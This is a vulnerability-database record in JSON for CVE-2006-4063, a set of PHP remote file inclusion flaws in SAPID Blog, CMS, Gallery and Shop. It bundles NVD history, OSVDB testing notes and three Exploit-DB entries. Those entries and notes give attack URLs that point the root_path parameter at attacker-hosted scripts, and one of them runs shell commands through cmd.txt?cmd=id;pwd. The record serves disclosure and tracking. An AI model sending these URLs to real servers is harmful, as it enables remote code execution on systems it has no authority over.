{"id": "CVE-2006-4063", "bulletinFamily": "NVD", "title": "CVE-2006-4063", "description": "Multiple PHP remote file inclusion vulnerabilities in Csaba Godor SAPID Blog Beta 2 and earlier allow remote attackers to execute arbitrary PHP code via a URL in the (1) root_path parameter to (a) usr/extensions/get_blog_infochannel.inc.php, (b) usr/extensions/get_blog_meta_info.inc.php, or (c) usr/extensions/get_infochannel.inc.php; or the (2) GLOBALS[root_path] parameter to (d) usr/extensions/get_tree.inc.php.", "published": "2006-08-09T20:04:00", "modified": "2017-10-18T21:29:17", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-4063", "reporter": "NVD", "references": ["https://www.exploit-db.com/exploits/2129", "https://exchange.xforce.ibmcloud.com/vulnerabilities/28251", "http://www.vupen.com/english/advisories/2006/3196"], "cvelist": ["CVE-2006-4063"], "type": "cve", "lastseen": "2017-10-19T11:12:29", "history": [{"bulletin": {"assessment": {"href": "", "name": "", "system": ""}, "bulletinFamily": "NVD", "cpe": ["cpe:/a:csaba_godor:sapid_blog_beta_2:initial"], "cvelist": ["CVE-2006-4063"], "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "description": "Multiple PHP remote file inclusion vulnerabilities in Csaba Godor SAPID Blog Beta 2 and earlier allow remote attackers to execute arbitrary PHP code via a URL in the (1) root_path parameter to (a) usr/extensions/get_blog_infochannel.inc.php, (b) usr/extensions/get_blog_meta_info.inc.php, or (c) usr/extensions/get_infochannel.inc.php; or the (2) GLOBALS[root_path] parameter to (d) usr/extensions/get_tree.inc.php.", "edition": 2, "enchantments": {}, "hash": "edf2a33631b3c24f0710992526622bfd6306c19c97f379d19c9d156332245699", "hashmap": [{"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "scanner"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "reporter"}, {"hash": "c89362d744d701959451f411897e9c7e", "key": "href"}, {"hash": "6d3f4796275bb54c21a33b82f399cc6d", "key": "assessment"}, {"hash": "e5d275b3ebd62646b78320753699e02e", "key": "cvss"}, {"hash": "f0a7722ca21fbf49c8b99df8509e2bff", "key": "cvelist"}, {"hash": "1d8d1a647b308714031b3ea3025a0898", "key": "references"}, {"hash": "e6e448709dceb54221436c99f89dfd43", "key": "title"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "a7fbe3e4b71a599f652cb556c21a595d", "key": "published"}, {"hash": "af1d797589edb8fa4e8b649f1b165537", "key": "description"}, {"hash": "d8c3a3e3d5fb40d939d38c2eaadcc85a", "key": "modified"}, {"hash": "2960a0e29a76d43b455956754d79711c", "key": "cpe"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-4063", "id": "CVE-2006-4063", "lastseen": "2017-07-20T10:49:28", "modified": "2017-07-19T21:32:48", "objectVersion": "1.3", "published": "2006-08-09T20:04:00", "references": ["https://exchange.xforce.ibmcloud.com/vulnerabilities/28251", "http://milw0rm.com/exploits/2129", "http://www.vupen.com/english/advisories/2006/3196"], "reporter": "NVD", "scanner": [], "title": "CVE-2006-4063", "type": "cve", "viewCount": 0}, "differentElements": ["references", "modified"], "edition": 2, "lastseen": "2017-07-20T10:49:28"}, {"bulletin": {"assessment": {"href": "", "name": "", "system": ""}, "bulletinFamily": "NVD", "cpe": ["cpe:/a:csaba_godor:sapid_blog_beta_2:initial"], "cvelist": ["CVE-2006-4063"], "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "description": "Multiple PHP remote file inclusion vulnerabilities in Csaba Godor SAPID Blog Beta 2 and earlier allow remote attackers to execute arbitrary PHP code via a URL in the (1) root_path parameter to (a) usr/extensions/get_blog_infochannel.inc.php, (b) usr/extensions/get_blog_meta_info.inc.php, or (c) usr/extensions/get_infochannel.inc.php; or the (2) GLOBALS[root_path] parameter to (d) usr/extensions/get_tree.inc.php.", "edition": 1, "enchantments": {}, "hash": "5080b8d0bef5e8085a35437e16ff4e0d325da21228c0fb268084cf44f9c5597f", "hashmap": [{"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "scanner"}, {"hash": "9cd9ac6b8a42dc85a9b002981ab9b298", "key": "references"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "reporter"}, {"hash": "985b7f530f58420937a9812f367014ee", "key": "modified"}, {"hash": "c89362d744d701959451f411897e9c7e", "key": "href"}, {"hash": "6d3f4796275bb54c21a33b82f399cc6d", "key": "assessment"}, {"hash": "e5d275b3ebd62646b78320753699e02e", "key": "cvss"}, {"hash": "f0a7722ca21fbf49c8b99df8509e2bff", "key": "cvelist"}, {"hash": "e6e448709dceb54221436c99f89dfd43", "key": "title"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "a7fbe3e4b71a599f652cb556c21a595d", "key": "published"}, {"hash": "af1d797589edb8fa4e8b649f1b165537", "key": "description"}, {"hash": "2960a0e29a76d43b455956754d79711c", "key": "cpe"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-4063", "id": "CVE-2006-4063", "lastseen": "2016-09-03T07:22:23", "modified": "2011-03-07T21:40:19", "objectVersion": "1.2", "published": "2006-08-09T20:04:00", "references": ["http://xforce.iss.net/xforce/xfdb/28251", "http://milw0rm.com/exploits/2129", "http://www.vupen.com/english/advisories/2006/3196"], "reporter": "NVD", "scanner": [], "title": "CVE-2006-4063", "type": "cve", "viewCount": 0}, "differentElements": ["references", "modified"], "edition": 1, "lastseen": "2016-09-03T07:22:23"}], "edition": 3, "hashmap": [{"key": "assessment", "hash": "6d3f4796275bb54c21a33b82f399cc6d"}, {"key": "bulletinFamily", "hash": "601892ece72be3be2f57266ca2354792"}, {"key": "cpe", "hash": "2960a0e29a76d43b455956754d79711c"}, {"key": "cvelist", "hash": "f0a7722ca21fbf49c8b99df8509e2bff"}, {"key": "cvss", "hash": "e5d275b3ebd62646b78320753699e02e"}, {"key": "description", "hash": "af1d797589edb8fa4e8b649f1b165537"}, {"key": "href", "hash": "c89362d744d701959451f411897e9c7e"}, {"key": "modified", "hash": "c873a9b26769d01ccf78e88007233c33"}, {"key": "published", "hash": "a7fbe3e4b71a599f652cb556c21a595d"}, {"key": "references", "hash": "2166043530593c93141e8aeda84fe77f"}, {"key": "reporter", "hash": "601892ece72be3be2f57266ca2354792"}, {"key": "scanner", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "title", "hash": "e6e448709dceb54221436c99f89dfd43"}, {"key": "type", "hash": "1716b5fcbb7121af74efdc153d0166c5"}], "hash": "ffb47f687cc07526fd262ead78654bae4aec6ce09c109b749a0390a2c48dde70", "viewCount": 0, "enchantments": {"score": {"value": 7.5, "vector": "NONE", "modified": "2017-10-19T11:12:29"}, "vulnersScore": 7.5}, "objectVersion": "1.3", "cpe": ["cpe:/a:csaba_godor:sapid_blog_beta_2:initial"], "assessment": {"href": "", "name": "", "system": ""}, "scanner": []}

{"osvdb": [{"lastseen": "2017-04-28T13:20:24", "references": [], "edition": 1, "description": "## Technical Description\nThis vulnerability is only present when the register_globals PHP option is set to 'on'. This has not been the default setting for PHP installs since version 4.2.0 (22-Apr-2002).\n## Manual Testing Notes\nhttp://[target]/[sapidshop_path]/usr/extensions/get_tree.inc.php?GLOBALS[root_path]=[evil_scripts]\n## References:\n[Secunia Advisory ID:21414](https://secuniaresearch.flexerasoftware.com/advisories/21414/)\nISS X-Force ID: 28255\nGeneric Exploit URL: http://milw0rm.com/exploits/2131\nFrSIRT Advisory: ADV-2006-3198\nFrSIRT Advisory: ADV-2006-3196\n[CVE-2006-4062](https://vulners.com/cve/CVE-2006-4062)\n[CVE-2006-4063](https://vulners.com/cve/CVE-2006-4063)\n", "reporter": "OSVDB", "published": "2006-08-07T09:35:12", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "title": "SAPID Shop get_tree.inc.php GLOBALS[root_path] Variable Remote File Inclusion", "type": "osvdb", "bulletinFamily": "software", "affectedSoftware": [], "cvelist": ["CVE-2006-4062", "CVE-2006-4063"], "modified": "2006-08-07T09:35:12", "href": "https://vulners.com/osvdb/OSVDB:27830", "id": "OSVDB:27830", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:24", "references": [], "edition": 1, "description": "## Technical Description\nThis vulnerability is only present when the register_globals PHP option is set to 'on'. This has not been the default setting for PHP installs since version 4.2.0 (22-Apr-2002).\n## Manual Testing Notes\nhttp://[target]/[sapidgalery_path]/usr/extensions/get_calendar.inc.php?root_path=[evil_scripts]\n## References:\n[Secunia Advisory ID:21413](https://secuniaresearch.flexerasoftware.com/advisories/21413/)\n[Related OSVDB ID: 27832](https://vulners.com/osvdb/OSVDB:27832)\nISS X-Force ID: 28254\nGeneric Exploit URL: http://milw0rm.com/exploits/2130\nFrSIRT Advisory: ADV-2006-3197\nFrSIRT Advisory: ADV-2006-3196\n[CVE-2006-4065](https://vulners.com/cve/CVE-2006-4065)\n[CVE-2006-4063](https://vulners.com/cve/CVE-2006-4063)\n", "reporter": "OSVDB", "published": "2006-08-07T09:20:09", "title": "SAPID Gallery get_calendar.inc.php root_path Variable Remote File Inclusion", "type": "osvdb", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "software", "affectedSoftware": [], "cvelist": ["CVE-2006-4065", "CVE-2006-4063"], "modified": "2006-08-07T09:20:09", "href": "https://vulners.com/osvdb/OSVDB:27831", "id": "OSVDB:27831", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:24", "references": [], "edition": 1, "description": "## Technical Description\nThis vulnerability is only present when the register_globals PHP option is set to 'on'. This has not been the default setting for PHP installs since version 4.2.0 (22-Apr-2002).\n## Manual Testing Notes\nhttp://[target]/usr/extensions/get_infochannel.inc.php?root_path=http://[attacker]/cmd.txt?cmd=id;pwd\n## References:\nVendor URL: http://sapid.sourceforge.net/\n[Secunia Advisory ID:21410](https://secuniaresearch.flexerasoftware.com/advisories/21410/)\n[Related OSVDB ID: 27829](https://vulners.com/osvdb/OSVDB:27829)\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-08/0103.html\nISS X-Force ID: 28250\nFrSIRT Advisory: ADV-2006-3191\nFrSIRT Advisory: ADV-2006-3196\n[CVE-2006-4026](https://vulners.com/cve/CVE-2006-4026)\n[CVE-2006-4063](https://vulners.com/cve/CVE-2006-4063)\nBugtraq ID: 19383\n", "reporter": "OSVDB", "published": "2006-08-07T06:50:16", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "title": "SAPID CMS get_infochannel.inc.php root_path Variable Remote File Inclusion", "type": "osvdb", "bulletinFamily": "software", "affectedSoftware": [], "cvelist": ["CVE-2006-4026", "CVE-2006-4063"], "modified": "2006-08-07T06:50:16", "href": "https://vulners.com/osvdb/OSVDB:27828", "id": "OSVDB:27828", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "exploitdb": [{"lastseen": "2016-01-31T15:34:53", "osvdbidlist": ["27829", "27828"], "references": [], "description": "SAPID CMS <= 1.2.3.05 (root_path) Remote File Include Vulnerabilities. CVE-2006-4026,CVE-2006-4063. Webapps exploit for php platform", "edition": 1, "reporter": "Kacper", "published": "2006-08-07T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "type": "exploitdb", "title": "SAPID CMS <= 1.2.3.05 root_path Remote File Include Vulnerabilities", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-4026", "CVE-2006-4063"], "modified": "2006-08-07T00:00:00", "id": "EDB-ID:2128", "href": "https://www.exploit-db.com/exploits/2128/", "sourceData": "$$$$$$$$$$$$$$$ DEVIL TEAM THE BEST POLISH TEAM $$$$$$$$$$$$$$$\n$$\n$$ SAPID CMS <= v. 1.2.3.05 (root_path) Remote File Include Vulnerability\n$$ Script site: http://sapid.sourceforge.net/\n$$\n$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$\n$$\n$$ Find by: Kacper (a.k.a Rahim)\n$$\n$$ Contact: kacper1964@yahoo.pl or http://www.devilteam.yum.pl\n$$\n$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$\n$$\n$$ Greetz: DragonHeart, Satan, Leito, Leon, Luzak,\n$$ Adam, DeathSpeed, Drzewko, pepi\n$$\n$$ Specjal greetz: DragonHeart ;-)\n$$\n$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$\n\nExpl:\n\nhttp://www.site.com/[sapidcms_path]/usr/extensions/get_infochannel.inc.php?root_path=[evil_scripts]\n\nhttp://www.site.com/[sapidcms_path]/usr/extensions/get_tree.inc.php?GLOBALS[root_path]=[evil_scripts]\n\n\n#Pozdro dla wszystkich ;-)\n\n# milw0rm.com [2006-08-07]\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/2128/"}, {"lastseen": "2016-01-31T15:35:07", "osvdbidlist": ["27831", "27832"], "references": [], "description": "SAPID Gallery <= 1.0 (root_path) Remote File Include Vulnerabilities. CVE-2006-4063,CVE-2006-4065. Webapps exploit for php platform", "edition": 1, "reporter": "Kacper", "published": "2006-08-07T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "type": "exploitdb", "title": "SAPID Gallery <= 1.0 root_path Remote File Include Vulnerabilities", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-4065", "CVE-2006-4063"], "modified": "2006-08-07T00:00:00", "id": "EDB-ID:2130", "href": "https://www.exploit-db.com/exploits/2130/", "sourceData": "$$$$$$$$$$$$$$$ DEVIL TEAM THE BEST POLISH TEAM $$$$$$$$$$$$$$$\n$$\n$$ SAPID Gallery <= v.1 (root_path) Remote File Include Vulnerability\n$$ Script site: http://sapid.sourceforge.net/\n$$\n$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$\n$$\n$$ Find by: Kacper (a.k.a Rahim)\n$$\n$$ Contact: kacper1964@yahoo.pl or http://www.devilteam.yum.pl\n$$\n$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$\n$$\n$$ Greetz: DragonHeart, Satan, Leito, Leon, Luzak,\n$$ Adam, DeathSpeed, Drzewko, pepi\n$$\n$$ Specjal greetz: DragonHeart ;-)\n$$\n$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$\n\nExpl:\n\nhttp://www.site.com/[sapidgalery_path]/usr/extensions/get_calendar.inc.php?root_path=[evil_scripts]\n\nhttp://www.site.com/[sapidgalery_path]/usr/extensions/get_tree.inc.php?GLOBALS[root_path]=[evil_scripts]\n\n\n#Pozdro dla wszystkich ;-)\n\n# milw0rm.com [2006-08-07]\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/2130/"}, {"lastseen": "2016-01-31T15:35:14", "osvdbidlist": ["27830"], "references": [], "description": "SAPID Shop <= 1.2 (root_path) Remote File Include Vulnerability. CVE-2006-4062,CVE-2006-4063. Webapps exploit for php platform", "edition": 1, "reporter": "Kacper", "published": "2006-08-07T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "type": "exploitdb", "title": "SAPID Shop <= 1.2 root_path Remote File Include Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-4062", "CVE-2006-4063"], "modified": "2006-08-07T00:00:00", "id": "EDB-ID:2131", "href": "https://www.exploit-db.com/exploits/2131/", "sourceData": "$$$$$$$$$$$$$$$ DEVIL TEAM THE BEST POLISH TEAM $$$$$$$$$$$$$$$\n$$\n$$ SAPID Shop <= v.1.2 (root_path) Remote File Include Vulnerability\n$$ Script site: http://sapid.sourceforge.net/\n$$\n$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$\n$$\n$$ Find by: Kacper (a.k.a Rahim)\n$$\n$$ Contact: kacper1964@yahoo.pl or http://www.devilteam.yum.pl\n$$\n$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$\n$$\n$$ Greetz: DragonHeart, Satan, Leito, Leon, Luzak,\n$$ Adam, DeathSpeed, Drzewko, pepi\n$$\n$$ Specjal greetz: DragonHeart ;-)\n$$\n$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$\n\nExpl:\n\nhttp://www.site.com/[sapidshop_path]/usr/extensions/get_tree.inc.php?GLOBALS[root_path]=[evil_scripts]\n\n#Pozdro dla wszystkich ;-)\n\n# milw0rm.com [2006-08-07]\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/2131/"}]}